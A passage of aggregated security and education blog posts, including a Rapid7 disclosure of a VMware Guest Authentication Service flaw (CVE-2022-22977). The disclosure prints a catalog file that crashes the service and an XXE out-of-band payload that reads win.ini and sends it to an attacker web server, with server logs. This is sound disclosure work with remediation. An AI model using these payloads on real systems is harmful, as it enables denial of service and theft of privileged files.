The justification for this approach seems pretty sensible, though. Why would a vendor go out of their way to explain what a security fix does? After all, if you know how the patch works, then you have a pretty good guess at the root cause of the vulnerability and, therefore, how the exploit works. So, by publicizing these patch details, you’re effectively leading attackers to the goods, based on your own documentation. Not cool, right?

So, the natural conclusion is that by limiting the technical details of a given vulnerability to merely the patch contents, and by withholding those details explained in plain language, proof-of-concept exploit code, screenshots, videos, and all the rest, you are limiting the general knowledge pool of people who actually understand the vulnerability and how to exploit it.

Unpacking the silent patch

This sounds like a great plan, but there’s a catch. When a software company releases a patch for software, in nearly all cases, they’re not using exotic packers, they’re not employing anti-forensics, and even if the patch data is encrypted and obfuscated, at some point it’s got to modify the code on the running software — which means that it’s all available to anyone who has a running instance of the patched software and knows how to use a debugger and a disassembler. And who uses debuggers to inspect the effects of patches? Exploit developers, pretty much exclusively.

Knowing this, let’s modify the expectations of the silent patch strategy: When you silently patch, you are intending to limit knowledge of the patched vulnerability to skilled exploit devs.

It’s still true that you’re excluding the casual attacker (or “script kiddie,” in the common parlance), and that’s great and desirable. However, you’re also excluding a huge population of IT protectors: penetration testers who are paid to write and run exploits to test defenses leap to mind, in addition to the folks who write and deploy defensive technologies like vulnerability management, intrusion detection and prevention, incident detection, and all the rest. You also exclude tech journalists, academics, and policy makers who want to understand and communicate the nature of software vulnerabilities, but who aren’t likely to bust out a disassembler.

Most significantly, you’re excluding the most important audience for your patch: the regular IT administrators and managers who need to sort out the incoming flow of patches based on some risk and severity criteria and make the call for downtime and update scheduling based on those criteria. Not all vulnerabilities are equal, and while protectors want to get around to all of them, they need to figure out which ones to apply today and which ones can wait for the next maintenance cycle.

By the way, it’s true that some of these IT professionals also have the capability to reverse-engineer your patch. In practice, people who are only interested in keeping IT humming never, ever reverse patches to see if they’re worth applying. It’s way too complicated and time-consuming. I’ve never seen a case where this is part of the decision-making process to patch now or later.

Don’t leave defenders in the dark

So now, let’s reexamine the case for silent patching yet again: When you silently patch, you are communicating vulnerability details, exclusively, to skilled, criminal attackers who are specifically targeting your product, while leaving your customers in the dark. You are intentionally withholding information from casual attackers, secondary defenders, and your customers and users who are desperate to make informed security engineering decisions involving your product or project. Oh, and let’s not forget, you’re also limiting knowledge about these fixed vulnerabilities from future employees and contributors, who very well might re-introduce the same or similar bugs in your product down the road. After all, the details are secret, even from future-you.

All this is to say, silent patching is tantamount to full disclosure to a very small audience who mostly want to hurt you and your users. Fully documented patches reach the much, much larger audience of people, present and future, who want to help you and your users. While it’s true that you are also offering educational opportunities to casual attackers along the way, I believe the global population of casual attackers is much, much smaller than your legitimate users and all the secondary and tertiary defenders who are on your side.

So, next time a vulnerability researcher states their intention of publishing details about their reported (and now patched) vulnerability, try to examine your urge to keep those details under wraps, and maybe even encourage them to be honest and transparent with their findings. The alternative is to build up the operational capabilities of the true criminal and espionage enterprises while degrading the decision-making power of IT protectors.


Evaluating the Security of an Enterprise IoT Deployment at Domino’s Pizza

Post Syndicated from Deral Heiland original https://blog.rapid7.com/2022/06/06/evaluating-the-security-of-an-enterprise-iot-deployment-at-dominos-pizza/

Evaluating the Security of an Enterprise IoT Deployment at Domino's Pizza

Recently, I had a great opportunity to work with Domino’s Pizza to evaluate an internally conceived Internet of Things (IoT)-based business solution they had designed and deployed throughout their US store locations. The goal of this research project was to understand the security implications around a large-scale enterprise IoT project and processes related to:

  • Acquisition, implementation, and deployment
  • Technology and functionality
  • Management and support

Laying the groundwork

I sat down with each of the internal teams involved with this project, and we discussed those key areas and how security was defined and applied within each. I gained valuable new insight into how security should play into the design and construction of a large IoT business solution, especially within the planning and acquisition phases. This opportunity allowed me to see how a security-driven organization like Domino’s approaches a large-scale project like this.

I walked away from this phase of the project with some great takeaways that should be considered on any similar project:

  • Always consider vendor security in your risk planning and modeling
  • Security “must-haves” should map to your organization’s internal security policies

Assessing the security status quo

Also, as part of this research project, I conducted a full ecosystem security assessment, examining all the critical hardware components, operation software, and associated network communications. As with any large-scale enterprise implementation, we did find a few security problems. This is the main reason all projects, even those with security built in from the start, should go through a wide-ranging security assessment to flush out any shortcomings that could be lurking under the hood. Once completed, I delivered a comprehensive report, which the security teams and project developers then used to quickly create solutions for fixing the identified issues.

This also allowed me the chance to observe and discuss the processes and methodologies this enterprise organization uses to build and deploy fixes into production in a safe way, avoiding impact to live systems.

During a typical security assessment of an enterprise-wide business solution like this, we are reminded of a couple key best-practice items that should always be considered, such as:

  • When testing the security for a new technology, use a holistic approach that targets the entire solutions ecosystem.
  • Conduct regular testing of documented security procedures — security is a moving target, and testing these procedures regularly can help identify deficiencies.

Bringing the idea to life

Once an idea is designed, built, and deployed into production, we have to make sure the deployed solution remains fully functional and secure. To accomplish that, we moved the deployed enterprise IoT solution under a structured management and support plan at Domino’s. As you would expect, this support structure was designed to help avoid or prevent outages and security incidents that could lead to production impact, loss of services, or loss of data.

Again, it was nice to sit down with the various teams involved in the support infrastructure and talk security and to also see how it was not only applied to this specific project, but how the organization applied these same security methodologies across the whole enterprise.

During this final evaluation phase of this project, I was reminded of one of the most critical takeaways that many organizations — unlike Domino’s, who did it correctly — fail to apply: When deploying new embedded technology within your enterprise environment, make sure the technology is properly integrated into your organization’s patch management.

At the conclusion of this research project, I took away a greatly improved understanding of the complexity, difficulties, and security best-practice challenges a large enterprise IoT project could demand. I was pleased to see, and work with, an organization that was up to that challenge and who successfully delivered this project to their business.

If you’d like to read more detail on this security research project, check out my report here.


Join us at the launch event of the Raspberry Pi Computing Education Research Centre

Post Syndicated from Sue Sentance original https://www.raspberrypi.org/blog/raspberry-pi-computing-education-research-centre-launch-event-invitation/

Last summer, the Raspberry Pi Foundation and the University of Cambridge Department of Computer Science and Technology created a new research centre focusing on computing education research for young people in both formal and non-formal education. The Raspberry Pi Computing Education Research Centre is an exciting venture through which we aim to deliver a step-change for the field.

Computing education research that focuses specifically on young people is relatively new, particularly in contrast to established research disciplines such as those focused on mathematics or science education. However, computing is now a mandatory part of the curriculum in several countries, and being taken up in education globally, so we need to rigorously investigate the learning and teaching of this subject, and do so in conjunction with schools and teachers.

You’re invited to our in-person launch event

To celebrate the official launch of the Raspberry Pi Computing Education Research Centre, we will be holding an in-person event in Cambridge, UK on Weds 20 July from 15.00. This event is free and open to all: if you are interested in computing education research, we invite you to register for a ticket to attend. By coming together in person, we want to help strengthen a collaborative community of researchers, teachers, and other education practitioners.

The launch event is your opportunity to meet and mingle with members of the Centre’s research team and listen to a series of short talks. We are delighted that Prof. Mark Guzdial (University of Michigan), who many readers will be familiar with, will be travelling from the US to join us in cutting the ribbon. Mark has worked in computer science education for decades and won many awards for his research, so I can’t think of anybody better to be our guest speaker. Our other speakers are Prof. Alastair Beresford from the Department of Computer Science and Technology, and Carrie Anne Philbin MBE, our Director of Educator Support at the Foundation.

The event will take place at the Department of Computer Science and Technology in Cambridge. It will start at 15.00 with a reception where you’ll have the chance to talk to researchers and see the work we’ve been doing. We will then hear from our speakers, before wrapping up at 17.30. You can find more details about the event location on the ticket registration page.

Our research at the Centre

The aim of the Raspberry Pi Computing Education Research Centre is to increase our understanding of teaching and learning computing, computer science, and associated subjects, with a particular focus on young people who are from backgrounds that are traditionally under-represented in the field of computing or who experience educational disadvantage.

We have been establishing the Centre over the last nine months. In October, I was appointed Director, and in December, we were awarded funding by Google for a one-year research project on culturally relevant computing teaching, following on from a project at the Raspberry Pi Foundation. The Centre’s research team is uniquely positioned, straddling both the University and the Foundation. Our two organisations complement each other very well: the University is one of the highest-ranking universities in the world and renowned for its leading-edge academic research, and the Raspberry Pi Foundation works with schools, educators, and learners globally to pursue its mission to put the power of computing into the hands of young people.

In our research at the Centre, we will make sure that:

  1. We collaborate closely with teachers and schools when implementing and evaluating research projects
  2. We publish research results in a number of different formats, as promptly as we can and without a paywall
  3. We translate research findings into practice across the Foundation’s extensive programmes and with our partners

We are excited to work with a large community of teachers and researchers, and we look forward to meeting you at the launch event.

Stay up to date

At the end of June, we’ll be launching a new website for the Centre at computingeducationresearch.org. This will be the place for you to find out more about our projects and events, and to sign up to our newsletter. For announcements on social media, follow the Raspberry Pi Foundation on Twitter or LinkedIn.

The post Join us at the launch event of the Raspberry Pi Computing Education Research Centre appeared first on Raspberry Pi.

CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/05/24/cve-2022-22977-vmware-guest-authentication-service-lpe-fixed/

CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)

A low-privileged local attacker can prevent the VMware Guest Authentication service (VGAuthService.exe) from running in a guest Windows environment and can crash this service, thus rendering the guest unstable. In some very contrived circumstances, the attacker can leak file content to which they do not have read access. We believe this would be scored as CVSSv3 AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H or 6.1 and is an instance of CWE-73: External Control of File Name or Path.

Product description

The VMware Guest Authentication Service (VGAuthService.exe) is part of the VMware Tools suite of software used to provide integration services with other VMware services. It is commonly installed on Windows guest operating systems, though it appears that its only function is to mystify users when it fails.

Credit

This issue was discovered by Jake Baines of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The host and guest software versions used in testing were:

  • Host platform: MacOS Big Sur 11.6.1
  • Host software: VMware Fusion Professional 12.2.1 (18811640)
  • Virtualized platform: Windows 10.0.17763.1999 and Windows Server 2019
  • Vulnerable software: VGAuthService.exe (VMware Guest Authentication Service) “File version: 11.3.5.59284”, “Product version 1.0.0. Build-18556986”

The VMware Guest Authentication Service (VGAuthService.exe) runs with NT AUTHORITY\SYSTEM permissions and attempts to read files from the non-existent directory C:\Program%20Files\VMware\VMware%20Tools\ during start-up.

A low-privileged user can create this directory structure and cause VGAuthService.exe to read attacker controlled files. The files that the attacker controls are “catalog”, “xmldsig-core-schema.xsd”, and “xenc-schema.xsd”. These files are used to define the XML structure used to communicate with VGAuthService.exe.

However, actually modifying the structure of these files seems to have limited effects on VGAuthService.exe. Below, we describe a denial of service (which could take a number of forms) and a file content leak via XML External Entity.

Impact

The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition, and there is a remote possibility of privileged file content exfiltration.

Denial of service

A low-privileged user can prevent the service from starting by providing a malformed catalog file. For example, creating the file C:\Program%20Files\VMware\VMware%20Tools\etc\catalog with the contents of:

<?xml version="1.0"?>
<!DOCTYPE catalog PUBLIC "-//OASIS//DTD Entity Resolution XML Catalog V1.0//EN" "http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd">
<catalog xmlns="urn:oasis:names:tc:entity:xmlns:xml:catalog">
  <uri name="http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/xmldsig-core-schema.xsd" uri="xmldsig-core-schema.xsd"/>
  <uri name="http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/xenc-schema.xsd" uri="\\10.0.0.2\fdsa\xenc-schema.xsd"/>
</catalog>

will simply prevent the service from ever running, due to the malformed uri field. The VGAuthService log file at C:\ProgramData\VMware\VMware VGAuth\logfile.txt.0 will contain this line:

[2022-02-01T14:03:50.100Z] [ warning] [VGAuthService] XML Error: uri entry 'uri' broken ?: \\10.0.0.2\fdsa\xenc-schema.xsd

After the “malicious” file is created, the system must be rebooted (or the service restarted) for the attack to take effect. Once the service fails to start, some remote tooling for the VMware guest will no longer function properly.

File content exfiltration via XML external entity (XXE) attacks, and the limitations thereof

VGAuthService uses XML libraries (libxmlsec and libxml2) that have XML External Entity processing capabilities. Because the attacker controls various XML files parsed by the service, the attacker in theory can execute XXE injection and XXE out-of-band (OOB) attacks to leak files that a low-privileged user can’t read (e.g. C:\windows\win.ini).

It is true that these styles of attacks do work against VGAuthService.exe, but there is a severe limitation. Traditionally, an XXE OOB attack leaks a file of the attacker’s choosing via an HTTP or FTP URI. For example, “http://attackurl:80/endpoint?FILEDATA”, where FILEDATA is the contents of the file. However, the XML library that VGAuthService.exe is using, libxml2, is very strict about properly formatted URIs, and any space character or newline will cause the exfiltration to fail. For example, let’s say we wanted to perform an XXE OOB attack and leak the contents of C:\Windows\win.ini. We’d create the following file at C:\Program%20Files\VMware\VMware%20Tools\etc\catalog:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.0.0.2/r7.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>

And then we’d create the file r7.dtd on 10.0.0.2:

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.0.0.2/xxe?%data;'>">

Then we serve the r7.dtd file via a Python web server on 10.0.0.2:

albinolobster@ubuntu:~/oob$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Once the attack is triggered, VGAuthService.exe will make quite a few HTTP requests to the attacker’s HTTP server:

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -

But notice that none of those HTTP requests contain the contents of win.ini. To see why, let’s take a look at VGAuthService’s log file.

[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: parser 
[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: error : 
[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: Invalid URI: http:///10.0.0.2/xxe?; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Here, we can see the contents of win.ini have been appended to http://10.0.0.2/xxe? and that has caused the XML library to error out due to an invalid URI. So we can’t leak win.ini over the network, but we were able to write it to VGAuthService’s log. Unfortunately (or fortunately, for defenders), the log file is only readable by administrative users, so leaking the contents of win.ini to the log file is no good for an attack.

An attacker can leak a file as long as it can be used to form a valid URI. I can think of one very specific case where ManageEngine has a “user” saved to file as “0:verylongpassword” where this could work. But that’s super specific. Either way, we can recreate this like so:

C:\>echo|set /p="helloworld" > r7.txt

C:\>type r7.txt
helloworld
C:\>

We then do the same attack as above, but instead of <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> we do <!ENTITY % data SYSTEM "file:///c:/r7.txt">

After executing the attack, we’ll see this on our HTTP server:

10.0.0.88 - - [01/Feb/2022 07:25:05] "GET /xxe?helloworld HTTP/1.0" 404 -

While this is technically a low-privileged user leaking a file, it is quite contrived, and honestly an unlikely scenario.

Another common XXE attack is leaking NTLM hashes, but libxml2 doesn’t honor UNC paths so that isn’t a possibility. So, in conclusion, the low-privileged attacker can only deny access to the service and, very occasionally, leak privileged files.

Remediation

VMware administrators who expect low-privileged, untrusted users to interact directly with the guest operating system should apply the patch at their convenience to avoid the denial-of-service condition. As stated above, the likelihood of anyone exploiting this vulnerability to exfiltrate secrets from the guest operating system is quite low, but if those circumstances apply to your environment, more urgency in patching is warranted.

In the absence of a patch, VMware administrators can create the missing directory with write permissions limited to administrators, and this should mitigate the issue entirely.
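
As a rough illustration of that workaround, here is a minimal Python sketch of our own (the directory advice above comes from the disclosure; the specific ACL choices here are assumptions, and the right permissions may differ in your environment). It pre-creates the probed directory tree and uses the Windows icacls utility to restrict it to SYSTEM and Administrators:

import os
import subprocess

# Pre-create the directory tree that VGAuthService.exe probes at start-up,
# so a low-privileged user cannot create it first.
root = r"C:\Program%20Files"
os.makedirs(os.path.join(root, "VMware", "VMware%20Tools", "etc"), exist_ok=True)

# Strip inherited permissions and grant full control only to SYSTEM and
# Administrators; ordinary users can no longer plant a malicious catalog file.
subprocess.run(
    ["icacls", root, "/inheritance:r",
     "/grant:r", "SYSTEM:(OI)(CI)F",
     "/grant:r", "Administrators:(OI)(CI)F"],
    check=True,
)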

Disclosure timeline

  • February, 2022: Issue discovered by Jake Baines of Rapid7
  • Thu, Feb 24, 2022: Initial disclosure to [email protected]
  • Thu, Feb 24, 2022: Issue tracked as VSRC-10022.
  • Wed, Mar 02, 2022: Vendor asks for an extension beyond original April disclosure date
  • Mon, May 23, 2022: CVE-2022-22977 reserved by the vendor
  • Tue, May 24, 2022: This disclosure, as well as the vendor’s disclosure published


A Year on from the Ransomware Task Force Report

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2022/05/24/a-year-on-from-the-ransomware-task-force-report/

A Year on from the Ransomware Task Force Report

If you follow cybersecurity, you’ve likely seen one of the many articles written recently on the one-year anniversary of the Colonial Pipeline ransomware attack, which saw fuel delivery suspended for six days, disrupting air and road travel across the southeastern states of the US. The Colonial attack was the biggest cyberattack against US critical infrastructure, making it something of a game-changer in the realm of ransomware, so it is absolutely worth noting the passage of time and investigating what’s changed since.

This blog will do that, but I’ll take a slightly different tack, as I’m also marking the anniversary of the Ransomware Task Force’s (RTF) report, which offered 48 recommendations for policymakers wanting to deter, disrupt, prepare, and respond to ransomware attacks. The report was issued a week prior to the Colonial attack.

Last week, I participated in an excellent event to mark the one-year anniversary of the RTF report. During the session, various ransomware experts discussed how the ransomware landscape has evolved over the past year, how government action has shaped this, and what more needs to be done. The Institute for Security and Technology (IST), which convenes and runs the RTF, has issued a paper capturing the points above. This blog offers my own thoughts on the matter, but it’s not at all exhaustive, and I recommend giving the official paper a read.

High-profile attacks raised the stakes

Looking back over the past year, in many ways, the Colonial attack – along with ransomware attacks on the Irish Health Service Executive (HSE) and JBS, the largest meat processing company in the world, all of which occurred during May 2021 – highlighted the exact concerns outlined in the RTF report. Specifically, the RTF had been convened based on the view that the high level of attacks against healthcare and other critical services through the pandemic made ransomware a matter of national security for those countries that are highly targeted.

In light of this, one of the most fundamental recommendations of the report was that this be acknowledged and met with a senior leadership and cross-governmental response. The Colonial attack resulted in President Biden addressing the issue of ransomware on national television. Subsequently, we have seen a huge cross-governmental focus on ransomware, with measures announced from departments including Homeland Security, Treasury, Justice, and State. We’ve also seen both Congress and the White House working on the issue. And while the US government has been the most vocal in its response, we have seen other governments also focusing on this issue as a priority and working together to amplify the impact of their action.

In June 2021, the Group of Seven (G7) governments of the world’s wealthiest democracies addressed ransomware at its annual summit. The resulting Communique capturing the group’s commitments includes pledges to work together to address the threat. In October 2021, the White House hosted the governments of 30 nations to discuss ransomware. The event launched the Counter Ransomware Initiative (CRI), committing to collaborate together to find solutions to reduce the ransomware threat. The CRI has identified key themes for further exploration and action, with a similar focus on deterring and disrupting attacks and driving adoption of greater cyber resilience.

Status of the RTF recommendations

This is all heartening to see and strongly aligns with the ethos and recommendations of the RTF recommendations. Drilling down into more of the details, there are many further areas of alignment, including the launch of coordinated awareness programs, introduction of sanctions, scrutiny of cryptocurrency regulations, and a focus on incident reporting regulations. The RTF paper provides a great deal more detail on these areas of alignment and the progress that has been made, as well as the areas that need more focus.

This, I believe, is the key point: A great deal of progress has been made, both in terms of building understanding of the problem and in developing alignment and collaboration among stakeholders, yet there is a great deal more work to be done. The partnerships between multiple governments — and between the public and private sectors — are hugely important for improving our odds against the attackers, but progress will not happen overnight. It will take time to see the real impact of the measures already taken, and there are yet measures to be determined, developed, and implemented.

Uncertain times

We must keep our eye on the ball and stay engaged, which is not easy when there are so many other demands on governments’ and business leaders’ limited time and resources. The Russia/Ukraine conflict has undoubtedly been a very time-consuming area of focus, though expectations that offensive cyber operations would be a key element of the Russian action have perhaps helped increase awareness of the need for cyber resilience. The economic downturn is another huge pressure and will almost certainly reduce critical infrastructure providers’ investments in cybersecurity as the cost of business increases in other areas, resulting in budget cuts. While both of these developments may distract governments and business leaders from ransomware, they may also increase ransomware activity as economic deprivation and job scarcity encourage more people to turn to cybercrime to make a living.

According to law enforcement and other government agencies, as well as the cyber insurance sector, reports of ransomware incidents are slowing down or declining. Due to a long-standing lack of consistent incident reporting, it’s hard to contextualize this, and while we very much hope it points to a reduction in attacks, we can’t say that that’s the case. Security researchers report that activity on the dark web seems to be continuing at the same pace as 2021, a record year for ransomware attacks. It’s possible that reports to law enforcement are down due to fears that involving them will result in regulatory repercussions, and reports to insurers could be down due to the introduction of more stringent requirements for claims.

The point is that it’s too early to tell, which is why we need to maintain a focus on the issue and seek out data points and anecdotal evidence to help us understand the impact of the government action taken so far, so we can continue to explore and adjust our approach. An ongoing focus, continued collaboration, and more data will help ensure we put as much pressure as possible on ransomware actors and the governments and systems that allow them to flourish. Over time, this is how we will make progress to reduce the ransomware threat.


A teaspoon of computing in every subject: Broadening participation in computer science

Post Syndicated from Sue Sentance original https://www.raspberrypi.org/blog/guzdial-teaspoon-computing-tsp-language-broadening-participation-school/

From May to November 2022, our seminars focus on the theme of cross-disciplinary computing. Through this seminar series, we want to explore the intersections and interactions of computing with all aspects of learning and life, and think about how they can help us teach young people. We were delighted to welcome Prof. Mark Guzdial (University of Michigan) as our first speaker.


Mark has worked in computer science (CS) education for decades and won many awards for his research, including the prestigious ACM SIGCSE Outstanding Contribution to Computing Education award in 2019. He has written literally hundreds of papers about CS education, and he authors an extremely popular computing education research blog that keeps us all up to date with what is going on in the field.

In his talk, Mark focused on his recent work around developing task-specific programming (TSP) languages, with which teachers can add a teaspoon (also abbreviated TSP) of programming to a wide variety of subject areas in schools. Mark’s overarching thesis is that if we want everyone to have some exposure to CS, then we need to integrate it into a range of subjects across the school curriculum. And he explained that this idea of “adding a teaspoon” embraces some core principles; for TSP languages to be successful, they need to:

  • Meet the teachers’ needs
  • Be relevant to the context or lesson in which it appears
  • Be technically easy to get to grips with

Mark neatly summarised this as ‘being both usable and useful’. 

Historical views on why we should all learn computer science

We can learn a lot from going back in time and reflecting on the history of computing. Mark started his talk by sharing the views of some of the eminent computer scientists of the early days of the subject. C. P. Snow maintained, way back in 1961, that all students should study CS, because it was too important to be left to a small handful of people.

C. P. Snow, 1961: “A handful of people, having no relation to the will of society, having no communication with the rest of society, will be taking decisions in secret which are going to affect our lives in the deepest sense.”

Alan Perlis, also in 1961, argued that everyone at university should study one course in CS rather than a topic such as calculus. His reason was that CS is about process, and thus gives students tools that they can use to change the world around them. I’d never heard of this work from the 1960s before, and it suggests incredible foresight. Perhaps we don’t need to even have the debate of whether computer science is for everyone — it seems it always was!

What’s the problem with the current situation?

In many of our seminars over the last two years, we have heard about the need to broaden participation in computing in school. Although computing is in theory mandatory in England for ages 5 to 16 (in practice, it’s offered to all children from age 5 to 14), other countries don’t have any computing for younger children. And once computing becomes optional, numbers drop, wherever you are.

Not enough students are experiencing computer science in school.

Mark shared with us that in US high schools, only 4.7% of students are enrolled in a CS course. However, students are studying other subjects, which brought him to the conclusion that CS should be introduced where the students already are. For example, Mark described that, at the Advanced Placement (AP) level in the US, many more students choose to take history than CS (399,000 vs 114,000), and the History AP cohort has a more even gender balance and a higher proportion of Black and Hispanic students.

The teaspoon approach to broadening participation

A solution to low uptake of CS being proposed by Mark and his colleagues is to add a little computing to other subjects, and in his talk he gave us some examples from history and mathematics, both subjects taken by a high proportion of US students. His focus is on high school, meaning learners aged 14 and upwards (upper secondary in Europe, or key stage 4 and 5 in England). To introduce a teaspoon of CS to other subjects, Mark’s research group builds tools using a participatory design approach; his group collaborates with teachers in schools to identify the needs of the teachers and students and design and iterate TSP languages in conjunction with them.

Mark demonstrated a number of TSP language prototypes his group has been building for use in particular contexts. The prototypes seem like simple apps, but can be classified as languages because they specify a process for a computational agent to execute. These small languages are designed to be used at a specific point in the lesson and should be learnable in ten minutes. For example, students can use a small ‘app’ specific to their topic, look at a script that generates a visualisation, and change some variables to find out how they impact the output. Students may also be able to access some program code, edit it, and see the impact of their edits. In this way, they discover through practical examples the way computer programs work, and how they can use CS principles to help build an understanding of the subject area they are currently studying. If the language is never used again, the learning cost was low enough that it was worth the value of adding computation to the one lesson.

We have recorded the seminar and will be sharing the video very soon, so bookmark this page.

Try TSP languages yourself

You can try out the TSP language prototypes Mark shared yourself, which will give you a good idea of how much a teaspoon is!

DV4L: For history students, the team and participating teachers have created a prototype called DV4L, which visualises historical data. The default example script shows population growth in Africa. Students can change some of the variables in the script to explore data related to other countries and other historical periods.

Pixel Equations: Mathematics and engineering students can use the Pixel Equations tool to learn about the way that pictures are made up of individual pixels. This can be introduced into lessons using a variety of contexts. One example lesson activity looks at images in the contexts of maps. This prototype is available in English and Spanish. 

Counting Sheets: Another example given by Mark was Counting Sheets, an interactive tool to support the exploration of counting problems, such as how many possible patterns can come from flipping three coins. 
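
To get a sense of just how small a teaspoon can be, here is a minimal Python sketch of the three-coin counting problem mentioned above (our own illustration, not one of the actual TSP prototypes):

from itertools import product

# Enumerate every pattern of heads (H) and tails (T) across three coin flips.
patterns = ["".join(flips) for flips in product("HT", repeat=3)]

for pattern in patterns:
    print(pattern)

# Three coins, two outcomes each: 2 * 2 * 2 = 8 possible patterns.
print(len(patterns), "possible patterns")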

Have a go yourself. What subjects could you imagine adding a teaspoon of computing to?

Join our next free research seminar

We’d love you to join us for the next seminar in our series on cross-disciplinary computing. On 7 June, we will hear from Pratim Sengupta, of the University of Calgary, Canada. He has conducted studies in science classrooms and non-formal learning environments, focusing on providing open and engaging experiences for anyone to explore code. Pratim will share his thoughts on the ways that more of us can become involved with code when we open up its richness and depth to a wider audience. He will also introduce us to his ideas about countering technocentrism, a key focus of his new book.

And finally… save another date!

We will shortly be sharing details about the official in-person launch event of the Raspberry Pi Computing Education Research Centre at the University of Cambridge on 20 July 2022. And guess who is going to be coming to Cambridge, UK, from Michigan to officially cut the ribbon for us? That’s right, Mark Guzdial. More information coming soon on how you can sign up to join us for free at this launch event.

The post A teaspoon of computing in every subject: Broadening participation in computer science appeared first on Raspberry Pi.

Proof of Stake and our next experiments in web3

Post Syndicated from Wesley Evans original https://blog.cloudflare.com/next-gen-web3-network/

Proof of Stake and our next experiments in web3

A little under four years ago we announced Cloudflare’s first experiments in web3 with our gateway to the InterPlanetary File System (IPFS). Three years ago we announced our experimental Ethereum Gateway. At Cloudflare, we often take experimental bets on the future of the Internet to help new technologies gain maturity and stability and for us to gain deep understanding of them.

Four years after our initial experiments in web3, it’s time to launch our next series of experiments to help advance the state of the art. These experiments are focused on finding new ways to help solve the scale and environmental challenges that face blockchain technologies today. Over the last two years there has been a rapid increase in the use of the underlying technologies that power web3. This growth has been a catalyst for a generation of startups, and yet it has also had negative externalities.

At Cloudflare, we are committed to helping to build a better Internet. That commitment balances technology and impact. The impact of certain older blockchain technologies on the environment has been challenging. The Proof of Work (PoW) consensus systems that secure many blockchains were instrumental in the bootstrapping of the web3 ecosystem. However, these systems do not scale well with the usage rates we see today. Proof of Work networks rely on complex cryptographic functions to create consensus and prevent attacks. Every node on the network is in a race to find a solution to this cryptographic problem. This cryptographic function is called a hash function. A hash function takes an input x and produces an output y. If you know x, it’s easy to compute y. However, given y, it’s prohibitively costly to find a matching x. Miners have to find an x whose output y has certain properties, such as ten leading zeros. Even with advanced chips, this is costly and heavily based on chance.
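
To make that concrete, here is a toy Python sketch of the mining race (a deliberately simplified illustration with made-up parameters; the mine function is our own, and real networks use different hash constructions and far harder targets):

import hashlib

def mine(data: str, difficulty: int = 5) -> int:
    """Search for a nonce so sha256(data + nonce) has `difficulty` leading zeros."""
    target = "0" * difficulty
    nonce = 0
    while True:
        y = hashlib.sha256(f"{data}{nonce}".encode()).hexdigest()
        if y.startswith(target):
            return nonce  # cheap to verify: one hash and a prefix check
        nonce += 1  # expensive to find: pure trial and error

nonce = mine("block payload")
print(nonce, hashlib.sha256(f"block payload{nonce}".encode()).hexdigest())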

While that process is incredibly secure because of the vast amount of hashing that occurs, Proof of Work networks are wasteful. This waste is driven by the fact that Proof of Work consensus mechanisms are electricity-intensive. In a PoW ecosystem, energy consumption scales directly with usage. So, for example, when web3 took off in 2020, the Bitcoin network started to consume the same amount of electricity as Switzerland (according to the Cambridge Bitcoin Electricity Consumption Index).

This inefficiency in resource use is by design to make it difficult for any single actor to threaten the security of the blockchain, and for the majority of the last decade, while use was low, this inefficiency was an acceptable trade off. The other major trade off accepted with the security of Proof of Work has been the number of transactions the network can handle per second. For instance, the Ethereum network can currently process about 30 transactions per second. This ultra-low transaction rate was acceptable when the technology was in development, but does not scale to meet the current demand.

